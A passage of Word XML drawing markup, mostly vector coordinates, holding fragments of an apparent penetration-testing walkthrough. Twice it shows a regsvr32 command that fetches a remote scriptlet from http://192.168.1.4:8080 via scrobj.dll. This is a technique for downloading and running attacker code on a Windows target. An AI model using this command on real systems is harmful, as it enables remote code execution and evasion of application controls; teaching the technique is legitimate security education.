21,2215,1627,2215,1632,2215,1638,2215,1644,2215,1650,2215,1656,2215,1662,2215,1668,2215,1675,2215,1675,2215,1675,2215,1675,2215,1675,2215,1675,2215,1675,2215,1675,2215,1675,2215,1675,2215,1675,2215,1675,2215,1675,2215,1675,2215,1675,2215,1675,2215,1675,2215,1675,2215,1675,2215,1675,2215,1675,2215,1675,2214,1675,2214,1675,2214,1675,2214,1675,2214,1675,2214,1675,2214,1675,2214,1675,2213,1675,2213,1675,2213,1675,2213,1675,2213,1675,2212,1675,2212,1675,2212,1675,2212,1675,2211,1675,2211,1675,2211,1675,2210,1675,2210,1675,2209,1675,2209,1675,2209,1675,2208,1675,2208,1675,2207,1675,2207,1675,2206,1675,2206,1675,2205,1675,2205,1675,2204,1675,2203,1675,2203,1675,2202,1675,2201,1675,2200,1675,2200,1675,2199,1675,2198,1675,2197,1675,2196,1675,2196,1675,2195,1675,2194,1675,2193,1675,2192,1675,2191,1675,2190,1675,2189,1675,2187,1675,2186,1675,2185,1675,2184,1675,2183,1675,2181,1675,2180,1675,2179,1675,2177,1675,2176,1675,2174,1675,2173,1675,2171,1675,2170,1675,2168,1675,2167,1675,2165,1675,2163,1675,2161,1675,2160,1675,2158,1675,2156,1675,2154,1675,2152,1675,2150,1675,2148,1675,2146,1675,2144,1675,2142,1675,2140,1675,2137,1675,2135,1675,2133,1675,2130,1675,2128,1675,2125,1675,2123,1675,2120,1675,2118,1675,2115,1675,2112,1675,2110,1675,2107,1675,2104,1675,2101,1675,2098,1675,2095,1675,2095,1675,2095,1675,2095,1675,2095,1675,2095,1675,2095,1675,2095,1675,2095,1675,2095,1675,2095,1675,2095,1675,2095,1675,2095,1675,2095,1675,2095,1674,2095,1674,2095,1674,2095,1674,2095,1674,2095,1674,2095,1674,2095,1673,2095,1673,2095,1673,2095,1673,2095,1672,2095,1672,2095,1672,2095,1672,2095,1671,2095,1671,2095,1670,2095,1670,2095,1669,2095,1669,2095,1668,2095,1668,2095,1667,2095,1667,2095,1666,2095,1665,2095,1664,2095,1664,2095,1663,2095,1662,2095,1661,2095,1660,2095,1659,2095,1658,2095,1657,2095,1656,2095,1655,2095,1654,2095,1652,2095,1651,2095,1650,2095,1648,2095,1647,2095,1645,2095,1644,2095,1642,2095,1640,2095,1639,2095,1637,2095,1635,2095,1633,2095,1631,2095,1629,2095,1627,2095,1625,2095,1623,2095,1621,2095,1618,2095,1616,2095,1613,2095,1611,2095,1608,2095,1606,2095,1603,2095,1600,2095,1597,2095,1594,2095,1591,2095,1588,2095,1585,2095,1582,2095,1579,2095,1575,2095,1572,2095,1568,2095,1564,2095,1561,2095,1557,2095,1553,2095,1549,2095,1545,2095,1541,2095,1537,2095,1532,2095,1528,2095,1523,2095,1519,2095,1514,2095,1509,2095,1505,2095,1500,2095,1495,2095,1489,2095,1484,2095,1479,2095,1473,2095,1468,2095,1462,2095,1456,2095,1451,2095,1445,2095,1439,2095,1432,2095,1426,2095,1420e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:156.500pt;margin-top:88.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3130,1770" coordsize="130,250">
        <v:shape style="position:absolute;left:3130;top:1770;width:130;height:250" coordorigin="3130,1770" coordsize="130,250" path="m3146,1780l3146,1780,3146,1780,3146,1780,3146,1780,3146,1780,3146,1780,3146,1780,3146,1780,3146,1780,3146,1780,3146,1780,3146,1780,3146,1780,3146,1780,3146,1780,3146,1780,3146,1780,3146,1780,3146,1780,3146,1780,3146,1780,3146,1780,3146,1780,3146,1780,3147,1780,3147,1780,3147,1780,3147,1780,3147,1780,3147,1780,3148,1780,3148,1780,3148,1780,3148,1780,3148,1780,3149,1780,3149,1780,3149,1780,3149,1780,3150,1780,3150,1780,3150,1780,3151,1780,3151,1780,3152,1780,3152,1780,3153,1780,3153,1780,3153,1780,3154,1780,3154,1780,3155,1780,3156,1780,3156,1780,3157,1780,3157,1780,3158,1780,3159,1780,3159,1780,3160,1780,3161,1780,3162,1780,3163,1780,3163,1780,3164,1780,3165,1780,3166,1780,3167,1780,3168,1780,3169,1780,3170,1780,3171,1780,3172,1780,3173,1780,3174,1780,3176,1780,3177,1780,3178,1780,3179,1780,3181,1780,3182,1780,3183,1780,3185,1780,3186,1780,3188,1780,3189,1780,3191,1780,3192,1780,3194,1780,3196,1780,3198,1780,3199,1780,3201,1780,3203,1780,3205,1780,3207,1780,3209,1780,3211,1780,3213,1780,3215,1780,3217,1780,3219,1780,3221,1780,3223,1780,3226,1780,3228,1780,3230,1780,3233,1780,3235,1780,3238,1780,3240,1780,3243,1780,3246,1780,3248,1780,3251,1780,3254,1780,3257,1780,3260,1780,3263,1780,3266,1780,3266,1780,3266,1780,3266,1780,3266,1780,3266,1780,3266,1780,3266,1780,3266,1780,3266,1780,3266,1780,3266,1780,3266,1780,3266,1780,3266,1780,3266,1780,3266,1780,3266,1781,3266,1781,3266,1781,3266,1781,3266,1781,3266,1781,3266,1782,3266,1782,3266,1782,3266,1782,3266,1783,3266,1783,3266,1783,3266,1784,3266,1784,3266,1784,3266,1785,3266,1785,3266,1786,3266,1786,3266,1787,3266,1788,3266,1788,3266,1789,3266,1790,3266,1790,3266,1791,3266,1792,3266,1793,3266,1794,3266,1795,3266,1796,3266,1797,3266,1798,3266,1799,3266,1800,3266,1801,3266,1802,3266,1804,3266,1805,3266,1806,3266,1808,3266,1809,3266,1811,3266,1813,3266,1814,3266,1816,3266,1818,3266,1820,3266,1821,3266,1823,3266,1825,3266,1827,3266,1830,3266,1832,3266,1834,3266,1836,3266,1839,3266,1841,3266,1844,3266,1846,3266,1849,3266,1852,3266,1855,3266,1857,3266,1860,3266,1863,3266,1866,3266,1870,3266,1873,3266,1876,3266,1880,3266,1883,3266,1887,3266,1890,3266,1894,3266,1898,3266,1902,3266,1906,3266,1910,3266,1914,3266,1918,3266,1922,3266,1927,3266,1931,3266,1936,3266,1941,3266,1945,3266,1950,3266,1955,3266,1960,3266,1965,3266,1971,3266,1976,3266,1981,3266,1987,3266,1993,3266,1998,3266,2004,3266,2010,3266,2016,3266,2022,3266,2029,3266,2035,3266,2035,3266,2035,3266,2035,3266,2035,3266,2035,3266,2035,3266,2035,3266,2035,3266,2035,3266,2035,3266,2035,3266,2035,3266,2035,3265,2035,3265,2035,3265,2035,3265,2035,3265,2035,3265,2035,3265,2035,3265,2035,3265,2035,3265,2035,3265,2035,3265,2035,3265,2035,3264,2035,3264,2035,3264,2035,3264,2035,3264,2035,3264,2035,3263,2035,3263,2035,3263,2035,3263,2035,3262,2035,3262,2035,3262,2035,3261,2035,3261,2035,3261,2035,3260,2035,3260,2035,3260,2035,3259,2035,3259,2035,3258,2035,3258,2035,3257,2035,3257,2035,3256,2035,3256,2035,3255,2035,3254,2035,3254,2035,3253,2035,3252,2035,3252,2035,3251,2035,3250,2035,3249,2035,3249,2035,3248,2035,3247,2035,3246,2035,3245,2035,3244,2035,3243,2035,3242,2035,3241,2035,3240,2035,3239,2035,3238,2035,3237,2035,3236,2035,3234,2035,3233,2035,3232,2035,3231,2035,3229,2035,3228,2035,3226,2035,3225,2035,3223,2035,3222,2035,3220,2035,3219,2035,3217,2035,3215,2035,3214,2035,3212,2035,3210,2035,3208,2035,3206,2035,3205,2035,3203,2035,3201,2035,3199,2035,3197,2035,3194,2035,3192,2035,3190,2035,3188,2035,3186,2035,3183,2035,3181,2035,3178,2035,3176,2035,3173,2035,3171,2035,3168,2035,3166,2035,3163,2035,3160,2035,3157,2035,3154,2035,3152,2035,3149,2035,3146,2035,3146,2035,3146,2035,3146,2035,3146,2035,3146,2035,3146,2035,3146,2035,3146,2035,3146,2035,3146,2035,3146,2035,3146,2035,3146,2035,3146,2035,3146,2035,3146,2035,3146,2034,3146,2034,3146,2034,3146,2034,3146,2034,3146,2034,3146,2033,3146,2033,3146,2033,3146,2033,3146,2032,3146,2032,3146,2032,3146,2031,3146,2031,3146,2031,3146,2030,3146,2030,3146,2029,3146,2029,3146,2028,3146,2027,3146,2027,3146,2026,3146,2025,3146,2025,3146,2024,3146,2023,3146,2022,3146,2021,3146,2020,3146,2019,3146,2018,3146,2017,3146,2016,3146,2015,3146,2014,3146,2012,3146,2011,3146,2010,3146,2008,3146,2007,3146,2005,3146,2004,3146,2002,3146,2001,3146,1999,3146,1997,3146,1995,3146,1993,3146,1991,3146,1989,3146,1987,3146,1985,3146,1983,3146,1981,3146,1979,3146,1976,3146,1974,3146,1971,3146,1969,3146,1966,3146,1963,3146,1960,3146,1958,3146,1955,3146,1952,3146,1948,3146,1945,3146,1942,3146,1939,3146,1935,3146,1932,3146,1928,3146,1925,3146,1921,3146,1917,3146,1913,3146,1909,3146,1905,3146,1901,3146,1897,3146,1893,3146,1888,3146,1884,3146,1879,3146,1874,3146,1870,3146,1865,3146,1860,3146,1855,3146,1850,3146,1844,3146,1839,3146,1834,3146,1828,3146,1822,3146,1817,3146,1811,3146,1805,3146,1799,3146,1793,3146,1786,3146,1780e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:174.500pt;margin-top:88.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3490,1770" coordsize="130,250">
        <v:shape style="position:absolute;left:3490;top:1770;width:130;height:250" coordorigin="3490,1770" coordsize="130,250" path="m3506,1780l3506,1780,3506,1780,3506,1780,3506,1780,3506,1780,3506,1780,3506,1780,3506,1780,3506,1780,3506,1780,3506,1780,3506,1780,3506,1780,3506,1780,3506,1780,3506,1780,3506,1780,3506,1780,3506,1780,3506,1780,3506,1780,3506,1780,3507,1780,3507,1780,3507,1780,3507,1780,3507,1780,3507,1780,3507,1780,3508,1780,3508,1780,3508,1780,3508,1780,3508,1780,3509,1780,3509,1780,3509,1780,3509,1780,3510,1780,3510,1780,3510,1780,3511,1780,3511,1780,3511,1780,3512,1780,3512,1780,3513,1780,3513,1780,3514,1780,3514,1780,3515,1780,3515,1780,3516,1780,3516,1780,3517,1780,3518,1780,3518,1780,3519,1780,3520,1780,3520,1780,3521,1780,3522,1780,3523,1780,3524,1780,3524,1780,3525,1780,3526,1780,3527,1780,3528,1780,3529,1780,3530,1780,3531,1780,3532,1780,3533,1780,3535,1780,3536,1780,3537,1780,3538,1780,3540,1780,3541,1780,3542,1780,3544,1780,3545,1780,3547,1780,3548,1780,3550,1780,3551,1780,3553,1780,3554,1780,3556,1780,3558,1780,3559,1780,3561,1780,3563,1780,3565,1780,3567,1780,3569,1780,3571,1780,3573,1780,3575,1780,3577,1780,3579,1780,3581,1780,3584,1780,3586,1780,3588,1780,3591,1780,3593,1780,3596,1780,3598,1780,3601,1780,3603,1780,3606,1780,3609,1780,3611,1780,3614,1780,3617,1780,3620,1780,3623,1780,3626,1780,3626,1780,3626,1780,3626,1780,3626,1780,3626,1780,3626,1780,3626,1780,3626,1780,3626,1780,3626,1780,3626,1780,3626,1780,3626,1780,3626,1780,3626,1780,3626,1780,3626,1781,3626,1781,3626,1781,3626,1781,3626,1781,3626,1781,3626,1782,3626,1782,3626,1782,3626,1782,3626,1783,3626,1783,3626,1783,3626,1784,3626,1784,3626,1784,3626,1785,3626,1785,3626,1786,3626,1786,3626,1787,3626,1788,3626,1788,3626,1789,3626,1790,3626,1790,3626,1791,3626,1792,3626,1793,3626,1794,3626,1795,3626,1796,3626,1797,3626,1798,3626,1799,3626,1800,3626,1801,3626,1802,3626,1804,3626,1805,3626,1806,3626,1808,3626,1809,3626,1811,3626,1813,3626,1814,3626,1816,3626,1818,3626,1820,3626,1821,3626,1823,3626,1825,3626,1827,3626,1830,3626,1832,3626,1834,3626,1836,3626,1839,3626,1841,3626,1844,3626,1846,3626,1849,3626,1852,3626,1855,3626,1857,3626,1860,3626,1863,3626,1866,3626,1870,3626,1873,3626,1876,3626,1880,3626,1883,3626,1887,3626,1890,3626,1894,3626,1898,3626,1902,3626,1906,3626,1910,3626,1914,3626,1918,3626,1922,3626,1927,3626,1931,3626,1936,3626,1941,3626,1945,3626,1950,3626,1955,3626,1960,3626,1965,3626,1971,3626,1976,3626,1981,3626,1987,3626,1993,3626,1998,3626,2004,3626,2010,3626,2016,3626,2022,3626,2029,3626,2035,3626,2035,3626,2035,3626,2035,3626,2035,3626,2035,3626,2035,3626,2035,3626,2035,3626,2035,3626,2035,3626,2035,3626,2035,3626,2035,3626,2035,3626,2035,3626,2035,3626,2035,3625,2035,3625,2035,3625,2035,3625,2035,3625,2035,3625,2035,3625,2035,3625,2035,3625,2035,3625,2035,3624,2035,3624,2035,3624,2035,3624,2035,3624,2035,3623,2035,3623,2035,3623,2035,3623,2035,3623,2035,3622,2035,3622,2035,3622,2035,3621,2035,3621,2035,3621,2035,3620,2035,3620,2035,3619,2035,3619,2035,3618,2035,3618,2035,3617,2035,3617,2035,3616,2035,3616,2035,3615,2035,3615,2035,3614,2035,3613,2035,3613,2035,3612,2035,3611,2035,3610,2035,3610,2035,3609,2035,3608,2035,3607,2035,3606,2035,3605,2035,3604,2035,3603,2035,3602,2035,3601,2035,3600,2035,3599,2035,3598,2035,3597,2035,3596,2035,3595,2035,3593,2035,3592,2035,3591,2035,3589,2035,3588,2035,3587,2035,3585,2035,3584,2035,3582,2035,3581,2035,3579,2035,3577,2035,3576,2035,3574,2035,3572,2035,3570,2035,3569,2035,3567,2035,3565,2035,3563,2035,3561,2035,3559,2035,3557,2035,3555,2035,3552,2035,3550,2035,3548,2035,3546,2035,3543,2035,3541,2035,3539,2035,3536,2035,3534,2035,3531,2035,3528,2035,3526,2035,3523,2035,3520,2035,3517,2035,3515,2035,3512,2035,3509,2035,3506,2035,3506,2035,3506,2035,3506,2035,3506,2035,3506,2035,3506,2035,3506,2035,3506,2035,3506,2035,3506,2035,3506,2035,3506,2035,3506,2035,3506,2035,3506,2035,3506,2035,3506,2034,3506,2034,3506,2034,3506,2034,3506,2034,3506,2034,3506,2033,3506,2033,3506,2033,3506,2033,3506,2032,3506,2032,3506,2032,3506,2031,3506,2031,3506,2031,3506,2030,3506,2030,3506,2029,3506,2029,3506,2028,3506,2027,3506,2027,3506,2026,3506,2025,3506,2025,3506,2024,3506,2023,3506,2022,3506,2021,3506,2020,3506,2019,3506,2018,3506,2017,3506,2016,3506,2015,3506,2014,3506,2012,3506,2011,3506,2010,3506,2008,3506,2007,3506,2005,3506,2004,3506,2002,3506,2001,3506,1999,3506,1997,3506,1995,3506,1993,3506,1991,3506,1989,3506,1987,3506,1985,3506,1983,3506,1981,3506,1979,3506,1976,3506,1974,3506,1971,3506,1969,3506,1966,3506,1963,3506,1960,3506,1958,3506,1955,3506,1952,3506,1948,3506,1945,3506,1942,3506,1939,3506,1935,3506,1932,3506,1928,3506,1925,3506,1921,3506,1917,3506,1913,3506,1909,3506,1905,3506,1901,3506,1897,3506,1893,3506,1888,3506,1884,3506,1879,3506,1874,3506,1870,3506,1865,3506,1860,3506,1855,3506,1850,3506,1844,3506,1839,3506,1834,3506,1828,3506,1822,3506,1817,3506,1811,3506,1805,3506,1799,3506,1793,3506,1786,3506,1780e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:192.500pt;margin-top:88.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3850,1770" coordsize="130,250">
        <v:shape style="position:absolute;left:3850;top:1770;width:130;height:250" coordorigin="3850,1770" coordsize="130,250" path="m3866,1780l3866,1780,3866,1780,3866,1780,3866,1780,3866,1780,3866,1780,3866,1780,3866,1780,3866,1780,3866,1780,3866,1780,3866,1780,3866,1780,3866,1780,3866,1780,3866,1780,3866,1780,3866,1780,3866,1780,3866,1780,3867,1780,3867,1780,3867,1780,3867,1780,3867,1780,3867,1780,3867,1780,3867,1780,3868,1780,3868,1780,3868,1780,3868,1780,3868,1780,3869,1780,3869,1780,3869,1780,3869,1780,3870,1780,3870,1780,3870,1780,3871,1780,3871,1780,3871,1780,3872,1780,3872,1780,3872,1780,3873,1780,3873,1780,3874,1780,3874,1780,3875,1780,3875,1780,3876,1780,3877,1780,3877,1780,3878,1780,3878,1780,3879,1780,3880,1780,3881,1780,3881,1780,3882,1780,3883,1780,3884,1780,3885,1780,3886,1780,3886,1780,3887,1780,3888,1780,3889,1780,3890,1780,3891,1780,3893,1780,3894,1780,3895,1780,3896,1780,3897,1780,3898,1780,3900,1780,3901,1780,3902,1780,3904,1780,3905,1780,3907,1780,3908,1780,3910,1780,3911,1780,3913,1780,3914,1780,3916,1780,3918,1780,3920,1780,3921,1780,3923,1780,3925,1780,3927,1780,3929,1780,3931,1780,3933,1780,3935,1780,3937,1780,3939,1780,3942,1780,3944,1780,3946,1780,3948,1780,3951,1780,3953,1780,3956,1780,3958,1780,3961,1780,3963,1780,3966,1780,3969,1780,3972,1780,3974,1780,3977,1780,3980,1780,3983,1780,3986,1780,3986,1780,3986,1780,3986,1780,3986,1780,3986,1780,3986,1780,3986,1780,3986,1780,3986,1780,3986,1780,3986,1780,3986,1780,3986,1780,3986,1780,3986,1780,3986,1780,3986,1781,3986,1781,3986,1781,3986,1781,3986,1781,3986,1781,3986,1782,3986,1782,3986,1782,3986,1782,3986,1783,3986,1783,3986,1783,3986,1784,3986,1784,3986,1784,3986,1785,3986,1785,3986,1786,3986,1786,3986,1787,3986,1788,3986,1788,3986,1789,3986,1790,3986,1790,3986,1791,3986,1792,3986,1793,3986,1794,3986,1795,3986,1796,3986,1797,3986,1798,3986,1799,3986,1800,3986,1801,3986,1802,3986,1804,3986,1805,3986,1806,3986,1808,3986,1809,3986,1811,3986,1813,3986,1814,3986,1816,3986,1818,3986,1820,3986,1821,3986,1823,3986,1825,3986,1827,3986,1830,3986,1832,3986,1834,3986,1836,3986,1839,3986,1841,3986,1844,3986,1846,3986,1849,3986,1852,3986,1855,3986,1857,3986,1860,3986,1863,3986,1866,3986,1870,3986,1873,3986,1876,3986,1880,3986,1883,3986,1887,3986,1890,3986,1894,3986,1898,3986,1902,3986,1906,3986,1910,3986,1914,3986,1918,3986,1922,3986,1927,3986,1931,3986,1936,3986,1941,3986,1945,3986,1950,3986,1955,3986,1960,3986,1965,3986,1971,3986,1976,3986,1981,3986,1987,3986,1993,3986,1998,3986,2004,3986,2010,3986,2016,3986,2022,3986,2029,3986,2035,3986,2035,3986,2035,3986,2035,3986,2035,3986,2035,3986,2035,3986,2035,3986,2035,3986,2035,3986,2035,3986,2035,3986,2035,3986,2035,3986,2035,3986,2035,3986,2035,3986,2035,3986,2035,3986,2035,3986,2035,3985,2035,3985,2035,3985,2035,3985,2035,3985,2035,3985,2035,3985,2035,3985,2035,3984,2035,3984,2035,3984,2035,3984,2035,3984,2035,3983,2035,3983,2035,3983,2035,3983,2035,3982,2035,3982,2035,3982,2035,3981,2035,3981,2035,3981,2035,3980,2035,3980,2035,3980,2035,3979,2035,3979,2035,3978,2035,3978,2035,3977,2035,3977,2035,3976,2035,3975,2035,3975,2035,3974,2035,3973,2035,3973,2035,3972,2035,3971,2035,3971,2035,3970,2035,3969,2035,3968,2035,3967,2035,3966,2035,3966,2035,3965,2035,3964,2035,3963,2035,3962,2035,3961,2035,3959,2035,3958,2035,3957,2035,3956,2035,3955,2035,3953,2035,3952,2035,3951,2035,3950,2035,3948,2035,3947,2035,3945,2035,3944,2035,3942,2035,3941,2035,3939,2035,3937,2035,3936,2035,3934,2035,3932,2035,3931,2035,3929,2035,3927,2035,3925,2035,3923,2035,3921,2035,3919,2035,3917,2035,3915,2035,3913,2035,3910,2035,3908,2035,3906,2035,3904,2035,3901,2035,3899,2035,3896,2035,3894,2035,3891,2035,3889,2035,3886,2035,3883,2035,3880,2035,3878,2035,3875,2035,3872,2035,3869,2035,3866,2035,3866,2035,3866,2035,3866,2035,3866,2035,3866,2035,3866,2035,3866,2035,3866,2035,3866,2035,3866,2035,3866,2035,3866,2035,3866,2035,3866,2035,3866,2035,3866,2035,3866,2034,3866,2034,3866,2034,3866,2034,3866,2034,3866,2034,3866,2033,3866,2033,3866,2033,3866,2033,3866,2032,3866,2032,3866,2032,3866,2031,3866,2031,3866,2031,3866,2030,3866,2030,3866,2029,3866,2029,3866,2028,3866,2027,3866,2027,3866,2026,3866,2025,3866,2025,3866,2024,3866,2023,3866,2022,3866,2021,3866,2020,3866,2019,3866,2018,3866,2017,3866,2016,3866,2015,3866,2014,3866,2012,3866,2011,3866,2010,3866,2008,3866,2007,3866,2005,3866,2004,3866,2002,3866,2001,3866,1999,3866,1997,3866,1995,3866,1993,3866,1991,3866,1989,3866,1987,3866,1985,3866,1983,3866,1981,3866,1979,3866,1976,3866,1974,3866,1971,3866,1969,3866,1966,3866,1963,3866,1960,3866,1958,3866,1955,3866,1952,3866,1948,3866,1945,3866,1942,3866,1939,3866,1935,3866,1932,3866,1928,3866,1925,3866,1921,3866,1917,3866,1913,3866,1909,3866,1905,3866,1901,3866,1897,3866,1893,3866,1888,3866,1884,3866,1879,3866,1874,3866,1870,3866,1865,3866,1860,3866,1855,3866,1850,3866,1844,3866,1839,3866,1834,3866,1828,3866,1822,3866,1817,3866,1811,3866,1805,3866,1799,3866,1793,3866,1786,3866,1780e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:210.500pt;margin-top:88.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4210,1770" coordsize="130,250">
        <v:shape style="position:absolute;left:4210;top:1770;width:130;height:250" coordorigin="4210,1770" coordsize="130,250" path="m4226,1780l4226,1780,4226,1780,4226,1780,4226,1780,4226,1780,4226,1780,4226,1780,4226,1780,4226,1780,4226,1780,4226,1780,4226,1780,4226,1780,4226,1780,4226,1780,4226,1780,4226,1780,4226,1780,4227,1780,4227,1780,4227,1780,4227,1780,4227,1780,4227,1780,4227,1780,4227,1780,4227,1780,4228,1780,4228,1780,4228,1780,4228,1780,4228,1780,4228,1780,4229,1780,4229,1780,4229,1780,4229,1780,4230,1780,4230,1780,4230,1780,4231,1780,4231,1780,4231,1780,4232,1780,4232,1780,4233,1780,4233,1780,4234,1780,4234,1780,4235,1780,4235,1780,4236,1780,4236,1780,4237,1780,4237,1780,4238,1780,4239,1780,4239,1780,4240,1780,4241,1780,4242,1780,4242,1780,4243,1780,4244,1780,4245,1780,4246,1780,4247,1780,4248,1780,4249,1780,4250,1780,4251,1780,4252,1780,4253,1780,4254,1780,4255,1780,4256,1780,4257,1780,4259,1780,4260,1780,4261,1780,4263,1780,4264,1780,4265,1780,4267,1780,4268,1780,4270,1780,4271,1780,4273,1780,4275,1780,4276,1780,4278,1780,4280,1780,4282,1780,4283,1780,4285,1780,4287,1780,4289,1780,4291,1780,4293,1780,4295,1780,4297,1780,4300,1780,4302,1780,4304,1780,4306,1780,4309,1780,4311,1780,4313,1780,4316,1780,4318,1780,4321,1780,4324,1780,4326,1780,4329,1780,4332,1780,4334,1780,4337,1780,4340,1780,4343,1780,4346,1780,4346,1780,4346,1780,4346,1780,4346,1780,4346,1780,4346,1780,4346,1780,4346,1780,4346,1780,4346,1780,4346,1780,4346,1780,4346,1780,4346,1780,4346,1780,4346,1780,4346,1781,4346,1781,4346,1781,4346,1781,4346,1781,4346,1781,4346,1782,4346,1782,4346,1782,4346,1782,4346,1783,4346,1783,4346,1783,4346,1784,4346,1784,4346,1784,4346,1785,4346,1785,4346,1786,4346,1786,4346,1787,4346,1788,4346,1788,4346,1789,4346,1790,4346,1790,4346,1791,4346,1792,4346,1793,4346,1794,4346,1795,4346,1796,4346,1797,4346,1798,4346,1799,4346,1800,4346,1801,4346,1802,4346,1804,4346,1805,4346,1806,4346,1808,4346,1809,4346,1811,4346,1813,4346,1814,4346,1816,4346,1818,4346,1820,4346,1821,4346,1823,4346,1825,4346,1827,4346,1830,4346,1832,4346,1834,4346,1836,4346,1839,4346,1841,4346,1844,4346,1846,4346,1849,4346,1852,4346,1855,4346,1857,4346,1860,4346,1863,4346,1866,4346,1870,4346,1873,4346,1876,4346,1880,4346,1883,4346,1887,4346,1890,4346,1894,4346,1898,4346,1902,4346,1906,4346,1910,4346,1914,4346,1918,4346,1922,4346,1927,4346,1931,4346,1936,4346,1941,4346,1945,4346,1950,4346,1955,4346,1960,4346,1965,4346,1971,4346,1976,4346,1981,4346,1987,4346,1993,4346,1998,4346,2004,4346,2010,4346,2016,4346,2022,4346,2029,4346,2035,4346,2035,4346,2035,4346,2035,4346,2035,4346,2035,4346,2035,4346,2035,4346,2035,4346,2035,4346,2035,4346,2035,4346,2035,4346,2035,4346,2035,4346,2035,4346,2035,4346,2035,4346,2035,4346,2035,4346,2035,4346,2035,4346,2035,4345,2035,4345,2035,4345,2035,4345,2035,4345,2035,4345,2035,4345,2035,4344,2035,4344,2035,4344,2035,4344,2035,4344,2035,4343,2035,4343,2035,4343,2035,4343,2035,4342,2035,4342,2035,4342,2035,4341,2035,4341,2035,4341,2035,4340,2035,4340,2035,4339,2035,4339,2035,4338,2035,4338,2035,4337,2035,4337,2035,4336,2035,4336,2035,4335,2035,4334,2035,4334,2035,4333,2035,4332,2035,4332,2035,4331,2035,4330,2035,4329,2035,4328,2035,4328,2035,4327,2035,4326,2035,4325,2035,4324,2035,4323,2035,4322,2035,4321,2035,4320,2035,4318,2035,4317,2035,4316,2035,4315,2035,4314,2035,4312,2035,4311,2035,4310,2035,4308,2035,4307,2035,4305,2035,4304,2035,4302,2035,4301,2035,4299,2035,4298,2035,4296,2035,4294,2035,4292,2035,4291,2035,4289,2035,4287,2035,4285,2035,4283,2035,4281,2035,4279,2035,4277,2035,4275,2035,4273,2035,4271,2035,4268,2035,4266,2035,4264,2035,4261,2035,4259,2035,4256,2035,4254,2035,4251,2035,4249,2035,4246,2035,4243,2035,4241,2035,4238,2035,4235,2035,4232,2035,4229,2035,4226,2035,4226,2035,4226,2035,4226,2035,4226,2035,4226,2035,4226,2035,4226,2035,4226,2035,4226,2035,4226,2035,4226,2035,4226,2035,4226,2035,4226,2035,4226,2035,4226,2035,4226,2034,4226,2034,4226,2034,4226,2034,4226,2034,4226,2034,4226,2033,4226,2033,4226,2033,4226,2033,4226,2032,4226,2032,4226,2032,4226,2031,4226,2031,4226,2031,4226,2030,4226,2030,4226,2029,4226,2029,4226,2028,4226,2027,4226,2027,4226,2026,4226,2025,4226,2025,4226,2024,4226,2023,4226,2022,4226,2021,4226,2020,4226,2019,4226,2018,4226,2017,4226,2016,4226,2015,4226,2014,4226,2012,4226,2011,4226,2010,4226,2008,4226,2007,4226,2005,4226,2004,4226,2002,4226,2001,4226,1999,4226,1997,4226,1995,4226,1993,4226,1991,4226,1989,4226,1987,4226,1985,4226,1983,4226,1981,4226,1979,4226,1976,4226,1974,4226,1971,4226,1969,4226,1966,4226,1963,4226,1960,4226,1958,4226,1955,4226,1952,4226,1948,4226,1945,4226,1942,4226,1939,4226,1935,4226,1932,4226,1928,4226,1925,4226,1921,4226,1917,4226,1913,4226,1909,4226,1905,4226,1901,4226,1897,4226,1893,4226,1888,4226,1884,4226,1879,4226,1874,4226,1870,4226,1865,4226,1860,4226,1855,4226,1850,4226,1844,4226,1839,4226,1834,4226,1828,4226,1822,4226,1817,4226,1811,4226,1805,4226,1799,4226,1793,4226,1786,4226,1780e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:142.800pt;width:467.400pt;height:100.200pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId10" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:345.600pt;width:307.800pt;height:103.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId11" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:468.600pt;width:467.400pt;height:157.8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started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following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machine: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157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regsvr32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i:http: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//192.168.1.4:8080/ybn7xESQYCGv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scrobj.dll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regsvr32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i:http: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//192.168.1.4:8080/ybn7xESQYCGv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scrobj.dll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445.449pt;width:0.0pt;height:396.550pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,8908" coordsize="0,7931">
        <v:shape style="position:absolute;left:10402;top:8908;width:0;height:7931" coordorigin="10402,8908" coordsize="0,7931" 